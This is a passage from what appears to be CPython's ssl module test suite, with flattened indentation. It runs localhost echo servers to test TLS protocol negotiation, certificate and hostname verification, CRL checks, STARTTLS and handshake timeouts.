# normally, we'd just stop here, but for the test
# harness, we want to stop the server
self.server.stop()
def __init__(self, certificate=None, ssl_version=None,
certreqs=None, cacerts=None,
chatty=True, connectionchatty=False, starttls_server=False,
npn_protocols=None, ciphers=None, context=None):
if context:
self.context = context
else:
self.context = ssl.SSLContext(ssl_version
if ssl_version is not None
else ssl.PROTOCOL_TLSv1)
self.context.verify_mode = (certreqs if certreqs is not None
else ssl.CERT_NONE)
if cacerts:
self.context.load_verify_locations(cacerts)
if certificate:
self.context.load_cert_chain(certificate)
if npn_protocols:
self.context.set_npn_protocols(npn_protocols)
if ciphers:
self.context.set_ciphers(ciphers)
self.chatty = chatty
self.connectionchatty = connectionchatty
self.starttls_server = starttls_server
self.sock = socket.socket()
self.port = support.bind_port(self.sock)
self.flag = None
self.active = False
self.selected_protocols = []
self.conn_errors = []
threading.Thread.__init__(self)
self.daemon = True
def __enter__(self):
self.start(threading.Event())
self.flag.wait()
return self
def __exit__(self, *args):
self.stop()
self.join()
def start(self, flag=None):
self.flag = flag
threading.Thread.start(self)
def run(self):
self.sock.settimeout(0.05)
self.sock.listen(5)
self.active = True
if self.flag:
# signal an event
self.flag.set()
while self.active:
try:
newconn, connaddr = self.sock.accept()
if support.verbose and self.chatty:
sys.stdout.write(' server: new connection from '
+ repr(connaddr) + '\n')
handler = self.ConnectionHandler(self, newconn, connaddr)
handler.start()
handler.join()
except socket.timeout:
pass
except KeyboardInterrupt:
self.stop()
self.sock.close()
def stop(self):
self.active = False
class AsyncoreEchoServer(threading.Thread):
# this one's based on asyncore.dispatcher
class EchoServer (asyncore.dispatcher):
class ConnectionHandler (asyncore.dispatcher_with_send):
def __init__(self, conn, certfile):
self.socket = ssl.wrap_socket(conn, server_side=True,
certfile=certfile,
do_handshake_on_connect=False)
asyncore.dispatcher_with_send.__init__(self, self.socket)
self._ssl_accepting = True
self._do_ssl_handshake()
def readable(self):
if isinstance(self.socket, ssl.SSLSocket):
while self.socket.pending() > 0:
self.handle_read_event()
return True
def _do_ssl_handshake(self):
try:
self.socket.do_handshake()
except (ssl.SSLWantReadError, ssl.SSLWantWriteError):
return
except ssl.SSLEOFError:
return self.handle_close()
except ssl.SSLError:
raise
except OSError as err:
if err.args[0] == errno.ECONNABORTED:
return self.handle_close()
else:
self._ssl_accepting = False
def handle_read(self):
if self._ssl_accepting:
self._do_ssl_handshake()
else:
data = self.recv(1024)
if support.verbose:
sys.stdout.write(" server: read %s from client\n" % repr(data))
if not data:
self.close()
else:
self.send(data.lower())
def handle_close(self):
self.close()
if support.verbose:
sys.stdout.write(" server: closed connection %s\n" % self.socket)
def handle_error(self):
raise
def __init__(self, certfile):
self.certfile = certfile
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.port = support.bind_port(sock, '')
asyncore.dispatcher.__init__(self, sock)
self.listen(5)
def handle_accepted(self, sock_obj, addr):
if support.verbose:
sys.stdout.write(" server: new connection from %s:%s\n" %addr)
self.ConnectionHandler(sock_obj, self.certfile)
def handle_error(self):
raise
def __init__(self, certfile):
self.flag = None
self.active = False
self.server = self.EchoServer(certfile)
self.port = self.server.port
threading.Thread.__init__(self)
self.daemon = True
def __str__(self):
return "<%s %s>" % (self.__class__.__name__, self.server)
def __enter__(self):
self.start(threading.Event())
self.flag.wait()
return self
def __exit__(self, *args):
if support.verbose:
sys.stdout.write(" cleanup: stopping server.\n")
self.stop()
if support.verbose:
sys.stdout.write(" cleanup: joining server thread.\n")
self.join()
if support.verbose:
sys.stdout.write(" cleanup: successfully joined.\n")
def start (self, flag=None):
self.flag = flag
threading.Thread.start(self)
def run(self):
self.active = True
if self.flag:
self.flag.set()
while self.active:
try:
asyncore.loop(1)
except:
pass
def stop(self):
self.active = False
self.server.close()
def bad_cert_test(certfile):
"""
Launch a server with CERT_REQUIRED, and check that trying to
connect to it with the given client certificate fails.
"""
server = ThreadedEchoServer(CERTFILE,
certreqs=ssl.CERT_REQUIRED,
cacerts=CERTFILE, chatty=False,
connectionchatty=False)
with server:
try:
with socket.socket() as sock:
s = ssl.wrap_socket(sock,
certfile=certfile,
ssl_version=ssl.PROTOCOL_TLSv1)
s.connect((HOST, server.port))
except ssl.SSLError as x:
if support.verbose:
sys.stdout.write("\nSSLError is %s\n" % x.args[1])
except OSError as x:
if support.verbose:
sys.stdout.write("\nOSError is %s\n" % x.args[1])
except OSError as x:
if x.errno != errno.ENOENT:
raise
if support.verbose:
sys.stdout.write("\OSError is %s\n" % str(x))
else:
raise AssertionError("Use of invalid cert should have failed!")
def server_params_test(client_context, server_context, indata=b"FOO\n",
chatty=True, connectionchatty=False, sni_name=None):
"""
Launch a server, connect a client to it and try various reads
and writes.
"""
stats = {}
server = ThreadedEchoServer(context=server_context,
chatty=chatty,
connectionchatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=sni_name) as s:
s.connect((HOST, server.port))
for arg in [indata, bytearray(indata), memoryview(indata)]:
if connectionchatty:
if support.verbose:
sys.stdout.write(
" client: sending %r...\n" % indata)
s.write(arg)
outdata = s.read()
if connectionchatty:
if support.verbose:
sys.stdout.write(" client: read %r\n" % outdata)
if outdata != indata.lower():
raise AssertionError(
"bad data <<%r>> (%d) received; expected <<%r>> (%d)\n"
% (outdata[:20], len(outdata),
indata[:20].lower(), len(indata)))
s.write(b"over\n")
if connectionchatty:
if support.verbose:
sys.stdout.write(" client: closing connection.\n")
stats.update({
'compression': s.compression(),
'cipher': s.cipher(),
'peercert': s.getpeercert(),
'client_npn_protocol': s.selected_npn_protocol()
})
s.close()
stats['server_npn_protocols'] = server.selected_protocols
return stats
def try_protocol_combo(server_protocol, client_protocol, expect_success,
certsreqs=None, server_options=0, client_options=0):
if certsreqs is None:
certsreqs = ssl.CERT_NONE
certtype = {
ssl.CERT_NONE: "CERT_NONE",
ssl.CERT_OPTIONAL: "CERT_OPTIONAL",
ssl.CERT_REQUIRED: "CERT_REQUIRED",
}[certsreqs]
if support.verbose:
formatstr = (expect_success and " %s->%s %s\n") or " {%s->%s} %s\n"
sys.stdout.write(formatstr %
(ssl.get_protocol_name(client_protocol),
ssl.get_protocol_name(server_protocol),
certtype))
client_context = ssl.SSLContext(client_protocol)
client_context.options |= client_options
server_context = ssl.SSLContext(server_protocol)
server_context.options |= server_options
# NOTE: we must enable "ALL" ciphers on the client, otherwise an
# SSLv23 client will send an SSLv3 hello (rather than SSLv2)
# starting from OpenSSL 1.0.0 (see issue #8322).
if client_context.protocol == ssl.PROTOCOL_SSLv23:
client_context.set_ciphers("ALL")
for ctx in (client_context, server_context):
ctx.verify_mode = certsreqs
ctx.load_cert_chain(CERTFILE)
ctx.load_verify_locations(CERTFILE)
try:
server_params_test(client_context, server_context,
chatty=False, connectionchatty=False)
# Protocol mismatch can result in either an SSLError, or a
# "Connection reset by peer" error.
except ssl.SSLError:
if expect_success:
raise
except OSError as e:
if expect_success or e.errno != errno.ECONNRESET:
raise
else:
if not expect_success:
raise AssertionError(
"Client protocol %s succeeded with server protocol %s!"
% (ssl.get_protocol_name(client_protocol),
ssl.get_protocol_name(server_protocol)))
class ThreadedTests(unittest.TestCase):
@skip_if_broken_ubuntu_ssl
def test_echo(self):
"""Basic test of an SSL client connecting to a server"""
if support.verbose:
sys.stdout.write("\n")
for protocol in PROTOCOLS:
with self.subTest(protocol=ssl._PROTOCOL_NAMES[protocol]):
context = ssl.SSLContext(protocol)
context.load_cert_chain(CERTFILE)
server_params_test(context, context,
chatty=True, connectionchatty=True)
def test_getpeercert(self):
if support.verbose:
sys.stdout.write("\n")
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
context.verify_mode = ssl.CERT_REQUIRED
context.load_verify_locations(CERTFILE)
context.load_cert_chain(CERTFILE)
server = ThreadedEchoServer(context=context, chatty=False)
with server:
s = context.wrap_socket(socket.socket(),
do_handshake_on_connect=False)
s.connect((HOST, server.port))
# getpeercert() raise ValueError while the handshake isn't
# done.
with self.assertRaises(ValueError):
s.getpeercert()
s.do_handshake()
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
cipher = s.cipher()
if support.verbose:
sys.stdout.write(pprint.pformat(cert) + '\n')
sys.stdout.write("Connection cipher is " + str(cipher) + '.\n')
if 'subject' not in cert:
self.fail("No subject field in certificate: %s." %
pprint.pformat(cert))
if ((('organizationName', 'Python Software Foundation'),)
not in cert['subject']):
self.fail(
"Missing or invalid 'organizationName' field in certificate subject; "
"should be 'Python Software Foundation'.")
self.assertIn('notBefore', cert)
self.assertIn('notAfter', cert)
before = ssl.cert_time_to_seconds(cert['notBefore'])
after = ssl.cert_time_to_seconds(cert['notAfter'])
self.assertLess(before, after)
s.close()
@unittest.skipUnless(have_verify_flags(),
"verify_flags need OpenSSL > 0.9.8")
def test_crl_check(self):
if support.verbose:
sys.stdout.write("\n")
server_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
server_context.load_cert_chain(SIGNED_CERTFILE)
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.verify_mode = ssl.CERT_REQUIRED
context.load_verify_locations(SIGNING_CA)
tf = getattr(ssl, "VERIFY_X509_TRUSTED_FIRST", 0)
self.assertEqual(context.verify_flags, ssl.VERIFY_DEFAULT | tf)
# VERIFY_DEFAULT should pass
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with context.wrap_socket(socket.socket()) as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
# VERIFY_CRL_CHECK_LEAF without a loaded CRL file fails
context.verify_flags |= ssl.VERIFY_CRL_CHECK_LEAF
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with context.wrap_socket(socket.socket()) as s:
with self.assertRaisesRegex(ssl.SSLError,
"certificate verify failed"):
s.connect((HOST, server.port))
# now load a CRL file. The CRL file is signed by the CA.
context.load_verify_locations(CRLFILE)
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with context.wrap_socket(socket.socket()) as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
def test_check_hostname(self):
if support.verbose:
sys.stdout.write("\n")
server_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
server_context.load_cert_chain(SIGNED_CERTFILE)
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.verify_mode = ssl.CERT_REQUIRED
context.check_hostname = True
context.load_verify_locations(SIGNING_CA)
# correct hostname should verify
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with context.wrap_socket(socket.socket(),
server_hostname="localhost") as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
# incorrect hostname should raise an exception
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with context.wrap_socket(socket.socket(),
server_hostname="invalid") as s:
with self.assertRaisesRegex(ssl.CertificateError,
"hostname 'invalid' doesn't match 'localhost'"):
s.connect((HOST, server.port))
# missing server_hostname arg should cause an exception, too
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with socket.socket() as s:
with self.assertRaisesRegex(ValueError,
"check_hostname requires server_hostname"):
context.wrap_socket(s)
def test_empty_cert(self):
"""Connecting with an empty cert file"""
bad_cert_test(os.path.join(os.path.dirname(__file__) or os.curdir,
"nullcert.pem"))
def test_malformed_cert(self):
"""Connecting with a badly formatted certificate (syntax error)"""
bad_cert_test(os.path.join(os.path.dirname(__file__) or os.curdir,
"badcert.pem"))
def test_nonexisting_cert(self):
"""Connecting with a non-existing cert file"""
bad_cert_test(os.path.join(os.path.dirname(__file__) or os.curdir,
"wrongcert.pem"))
def test_malformed_key(self):
"""Connecting with a badly formatted key (syntax error)"""
bad_cert_test(os.path.join(os.path.dirname(__file__) or os.curdir,
"badkey.pem"))
def test_rude_shutdown(self):
"""A brutal shutdown of an SSL server should raise an OSError
in the client when attempting handshake.
"""
listener_ready = threading.Event()
listener_gone = threading.Event()
s = socket.socket()
port = support.bind_port(s, HOST)
# `listener` runs in a thread. It sits in an accept() until
# the main thread connects. Then it rudely closes the socket,
# and sets Event `listener_gone` to let the main thread know
# the socket is gone.
def listener():
s.listen(5)
listener_ready.set()
newsock, addr = s.accept()
newsock.close()
s.close()
listener_gone.set()
def connector():
listener_ready.wait()
with socket.socket() as c:
c.connect((HOST, port))
listener_gone.wait()
try:
ssl_sock = ssl.wrap_socket(c)
except OSError:
pass
else:
self.fail('connecting to closed SSL socket should have failed')
t = threading.Thread(target=listener)
t.start()
try:
connector()
finally:
t.join()
@skip_if_broken_ubuntu_ssl
@unittest.skipUnless(hasattr(ssl, 'PROTOCOL_SSLv2'),
"OpenSSL is compiled without SSLv2 support")
def test_protocol_sslv2(self):
"""Connecting to an SSLv2 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, True)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, True, ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, True, ssl.CERT_REQUIRED)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv23, False)
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_TLSv1, False)
# SSLv23 client with specific SSL options
if no_sslv2_implies_sslv3_hello():
# No SSLv2 => client will use an SSLv3 hello on recent OpenSSLs
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv23, False,
client_options=ssl.OP_NO_SSLv2)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv23, False,
client_options=ssl.OP_NO_SSLv3)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv23, False,
client_options=ssl.OP_NO_TLSv1)
@skip_if_broken_ubuntu_ssl
def test_protocol_sslv23(self):
"""Connecting to an SSLv23 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try:
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv2, True)
except OSError as x:
# this fails on some older versions of OpenSSL (0.9.7l, for instance)
if support.verbose:
sys.stdout.write(
" SSL2 client to SSL23 server test unexpectedly failed:\n %s\n"
% str(x))
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv23, True)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1, True)
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv3, False, ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv23, True, ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1, True, ssl.CERT_OPTIONAL)
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv3, False, ssl.CERT_REQUIRED)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv23, True, ssl.CERT_REQUIRED)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1, True, ssl.CERT_REQUIRED)
# Server with specific SSL options
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv3, False,
server_options=ssl.OP_NO_SSLv3)
# Will choose TLSv1
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv23, True,
server_options=ssl.OP_NO_SSLv2 | ssl.OP_NO_SSLv3)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1, False,
server_options=ssl.OP_NO_TLSv1)
@skip_if_broken_ubuntu_ssl
@unittest.skipUnless(hasattr(ssl, 'PROTOCOL_SSLv3'),
"OpenSSL is compiled without SSLv3 support")
def test_protocol_sslv3(self):
"""Connecting to an SSLv3 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, True)
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, True, ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, True, ssl.CERT_REQUIRED)
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv2, False)
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv23, False,
client_options=ssl.OP_NO_SSLv3)
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_TLSv1, False)
if no_sslv2_implies_sslv3_hello():
# No SSLv2 => client will use an SSLv3 hello on recent OpenSSLs
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv23,
False, client_options=ssl.OP_NO_SSLv2)
@skip_if_broken_ubuntu_ssl
def test_protocol_tlsv1(self):
"""Connecting to a TLSv1 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, True)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, True, ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, True, ssl.CERT_REQUIRED)
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_SSLv2, False)
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_SSLv23, False,
client_options=ssl.OP_NO_TLSv1)
@skip_if_broken_ubuntu_ssl
@unittest.skipUnless(hasattr(ssl, "PROTOCOL_TLSv1_1"),
"TLS version 1.1 not supported.")
def test_protocol_tlsv1_1(self):
"""Connecting to a TLSv1.1 server with various client options.
Testing against older TLS versions."""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLSv1_1, True)
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_SSLv2, False)
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_SSLv23, False,
client_options=ssl.OP_NO_TLSv1_1)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1_1, True)
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLSv1, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1_1, False)
@skip_if_broken_ubuntu_ssl
@unittest.skipUnless(hasattr(ssl, "PROTOCOL_TLSv1_2"),
"TLS version 1.2 not supported.")
def test_protocol_tlsv1_2(self):
"""Connecting to a TLSv1.2 server with various client options.
Testing against older TLS versions."""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLSv1_2, True,
server_options=ssl.OP_NO_SSLv3|ssl.OP_NO_SSLv2,
client_options=ssl.OP_NO_SSLv3|ssl.OP_NO_SSLv2,)
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_SSLv2, False)
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_SSLv23, False,
client_options=ssl.OP_NO_TLSv1_2)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1_2, True)
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLSv1, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1_2, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLSv1_1, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLSv1_2, False)
def test_starttls(self):
"""Switching from clear text to encrypted and back again."""
msgs = (b"msg 1", b"MSG 2", b"STARTTLS", b"MSG 3", b"msg 4", b"ENDTLS", b"msg 5", b"msg 6")
server = ThreadedEchoServer(CERTFILE,
ssl_version=ssl.PROTOCOL_TLSv1,
starttls_server=True,
chatty=True,
connectionchatty=True)
wrapped = False
with server:
s = socket.socket()
s.setblocking(1)
s.connect((HOST, server.port))
if support.verbose:
sys.stdout.write("\n")
for indata in msgs:
if support.verbose:
sys.stdout.write(
" client: sending %r...\n" % indata)
if wrapped:
conn.write(indata)
outdata = conn.read()
else:
s.send(indata)
outdata = s.recv(1024)
msg = outdata.strip().lower()
if indata == b"STARTTLS" and msg.startswith(b"ok"):
# STARTTLS ok, switch to secure mode
if support.verbose:
sys.stdout.write(
" client: read %r from server, starting TLS...\n"
% msg)
conn = ssl.wrap_socket(s, ssl_version=ssl.PROTOCOL_TLSv1)
wrapped = True
elif indata == b"ENDTLS" and msg.startswith(b"ok"):
# ENDTLS ok, switch back to clear text
if support.verbose:
sys.stdout.write(
" client: read %r from server, ending TLS...\n"
% msg)
s = conn.unwrap()
wrapped = False
else:
if support.verbose:
sys.stdout.write(
" client: read %r from server\n" % msg)
if support.verbose:
sys.stdout.write(" client: closing connection.\n")
if wrapped:
conn.write(b"over\n")
else:
s.send(b"over\n")
if wrapped:
conn.close()
else:
s.close()
def test_socketserver(self):
"""Using a SocketServer to create and manage SSL connections."""
server = make_https_server(self, certfile=CERTFILE)
# try to connect
if support.verbose:
sys.stdout.write('\n')
with open(CERTFILE, 'rb') as f:
d1 = f.read()
d2 = ''
# now fetch the same data from the HTTPS server
url = 'https://localhost:%d/%s' % (
server.port, os.path.split(CERTFILE)[1])
context = ssl.create_default_context(cafile=CERTFILE)
f = urllib.request.urlopen(url, context=context)
try:
dlen = f.info().get("content-length")
if dlen and (int(dlen) > 0):
d2 = f.read(int(dlen))
if support.verbose:
sys.stdout.write(
" client: read %d bytes from remote server '%s'\n"
% (len(d2), server))
finally:
f.close()
self.assertEqual(d1, d2)
def test_asyncore_server(self):
"""Check the example asyncore integration."""
indata = "TEST MESSAGE of mixed case\n"
if support.verbose:
sys.stdout.write("\n")
indata = b"FOO\n"
server = AsyncoreEchoServer(CERTFILE)
with server:
s = ssl.wrap_socket(socket.socket())
s.connect(('127.0.0.1', server.port))
if support.verbose:
sys.stdout.write(
" client: sending %r...\n" % indata)
s.write(indata)
outdata = s.read()
if support.verbose:
sys.stdout.write(" client: read %r\n" % outdata)
if outdata != indata.lower():
self.fail(
"bad data <<%r>> (%d) received; expected <<%r>> (%d)\n"
% (outdata[:20], len(outdata),
indata[:20].lower(), len(indata)))
s.write(b"over\n")
if support.verbose:
sys.stdout.write(" client: closing connection.\n")
s.close()
if support.verbose:
sys.stdout.write(" client: connection closed.\n")
def test_recv_send(self):
"""Test recv(), send() and friends."""
if support.verbose:
sys.stdout.write("\n")
server = ThreadedEchoServer(CERTFILE,
certreqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLSv1,
cacerts=CERTFILE,
chatty=True,
connectionchatty=False)
with server:
s = ssl.wrap_socket(socket.socket(),
server_side=False,
certfile=CERTFILE,
ca_certs=CERTFILE,
cert_reqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLSv1)
s.connect((HOST, server.port))
# helper methods for standardising recv* method signatures
def _recv_into():
b = bytearray(b"\0"*100)
count = s.recv_into(b)
return b[:count]
def _recvfrom_into():
b = bytearray(b"\0"*100)
count, addr = s.recvfrom_into(b)
return b[:count]
# (name, method, whether to expect success, *args)
send_methods = [
('send', s.send, True, []),
('sendto', s.sendto, False, ["some.address"]),
('sendall', s.sendall, True, []),
]
recv_methods = [
('recv', s.recv, True, []),
('recvfrom', s.recvfrom, False, ["some.address"]),
('recv_into', _recv_into, True, []),
('recvfrom_into', _recvfrom_into, False, []),
]
data_prefix = "PREFIX_"
for meth_name, send_meth, expect_success, args in send_methods:
indata = (data_prefix + meth_name).encode('ascii')
try:
send_meth(indata, *args)
outdata = s.read()
if outdata != indata.lower():
self.fail(
"While sending with <<{name:s}>> bad data "
"<<{outdata:r}>> ({nout:d}) received; "
"expected <<{indata:r}>> ({nin:d})\n".format(
name=meth_name, outdata=outdata[:20],
nout=len(outdata),
indata=indata[:20], nin=len(indata)
)
)
except ValueError as e:
if expect_success:
self.fail(
"Failed to send with method <<{name:s}>>; "
"expected to succeed.\n".format(name=meth_name)
)
if not str(e).startswith(meth_name):
self.fail(
"Method <<{name:s}>> failed with unexpected "
"exception message: {exp:s}\n".format(
name=meth_name, exp=e
)
)
for meth_name, recv_meth, expect_success, args in recv_methods:
indata = (data_prefix + meth_name).encode('ascii')
try:
s.send(indata)
outdata = recv_meth(*args)
if outdata != indata.lower():
self.fail(
"While receiving with <<{name:s}>> bad data "
"<<{outdata:r}>> ({nout:d}) received; "
"expected <<{indata:r}>> ({nin:d})\n".format(
name=meth_name, outdata=outdata[:20],
nout=len(outdata),
indata=indata[:20], nin=len(indata)
)
)
except ValueError as e:
if expect_success:
self.fail(
"Failed to receive with method <<{name:s}>>; "
"expected to succeed.\n".format(name=meth_name)
)
if not str(e).startswith(meth_name):
self.fail(
"Method <<{name:s}>> failed with unexpected "
"exception message: {exp:s}\n".format(
name=meth_name, exp=e
)
)
# consume data
s.read()
# Make sure sendmsg et al are disallowed to avoid
# inadvertent disclosure of data and/or corruption
# of the encrypted data stream
self.assertRaises(NotImplementedError, s.sendmsg, [b"data"])
self.assertRaises(NotImplementedError, s.recvmsg, 100)
self.assertRaises(NotImplementedError,
s.recvmsg_into, bytearray(100))
s.write(b"over\n")
s.close()
def test_handshake_timeout(self):
# Issue #5103: SSL handshake must respect the socket timeout
server = socket.socket(socket.AF_INET)
host = "127.0.0.1"
port = support.bind_port(server)
started = threading.Event()
finish = False
def serve():
server.listen(5)
started.set()
conns = []
while not finish:
r, w, e = select.select([server], [], [], 0.1)
if server in r:
# Let the socket hang around rather than having
# it closed by garbage collection.
conns.append(server.accept()[0])
for sock in conns:
sock.close()
t = threading.Thread(target=serve)
t.start()
started.wait()
try:
try:
c = socket.socket(socket.AF_INET)
c.settimeout(0.2)
c.connect((host, port))
# Will attempt handshake and time out
self.assertRaisesRegex(socket.timeout, "timed out",
ssl.wrap_socket, c)
finally:
c.close()
try:
c = socket.socket(socket.AF_INET)
c = ssl.wrap_socket(c)
c.settimeout(0.2)
# Will attempt handshake and time out
self.assertRaisesRegex(socket.timeout, "timed out",
c.connect, (host, port))
finally:
c.close()
finally:
finish = True
t.join()
server.close()
def test_server_accept(self):
# Issue #16357: accept() on a SSLSocket created through
# SSLContext.wrap_socket().
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
context.verify_mode = ssl.CERT_REQUIRED
context.load_verify_locations(CERTFILE)
context.load_cert_chain(CERTFILE)
server = socket.socket(socket.AF_INET)
host = "127.0.0.1"
port = support.bind_port(server)
server = context.wrap_socket(server, server_side=True)
evt = threading.Event()
remote = None
peer = None
def serve():
nonlocal remote, peer
server.listen(5)
# Block on the accept and wait on the connection to close.
evt.set()
remote, peer = server.accept()
remote.recv(1)
t = threading.Thread(target=serve)
t.start()
# Client wait until server setup and perform a connect.
evt.wait()
client = context.wrap_socket(socket.socket())
client.connect((host, port))
client_addr = client.getsockname()
client.close()
t.join()
remote.close()
server.close()
# Sanity checks.
self.assertIsInstance(remote, ssl.SSLSocket)
self.assertEqual(peer, client_addr)
def test_getpeercert_enotconn(self):
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
with context.wrap_socket(socket.socket()) as sock:
with self.assertRaises(OSError) as cm:
sock.getpeercert()
self.assertEqual(cm.exception.errno, errno.ENOTCONN)
def test_do_handshake_enotconn(self):
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
with context.wrap_socket(socket.socket()) as sock:
with self.assertRaises(OSError) as cm:
sock.do_handshake()
self.assertEqual(cm.exception.errno, errno.ENOTCONN)
def test_default_ciphers(self):
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
try:
# Force a set of weak ciphers on our client context
context.set_ciphers("DES")
except ssl.SSLError:
self.skipTest("no DES cipher available")
with ThreadedEchoServer(CERTFILE,
ssl_version=ssl.PROTOCOL_SSLv23,
chatty=False) as server:
with context.wrap_socket(socket.socket()) as s:
with self.assertRaises(OSError):
s.connect((HOST, server.port))
self.assertIn("no shared cipher", str(server.conn_errors[0]))
@unittest.skipUnless(ssl.HAS_ECDH, "test requires ECDH-enabled OpenSSL")
def test_default_ecdh_curve(self):
# Issue #21015: elliptic curve-based Diffie Hellman key exchange
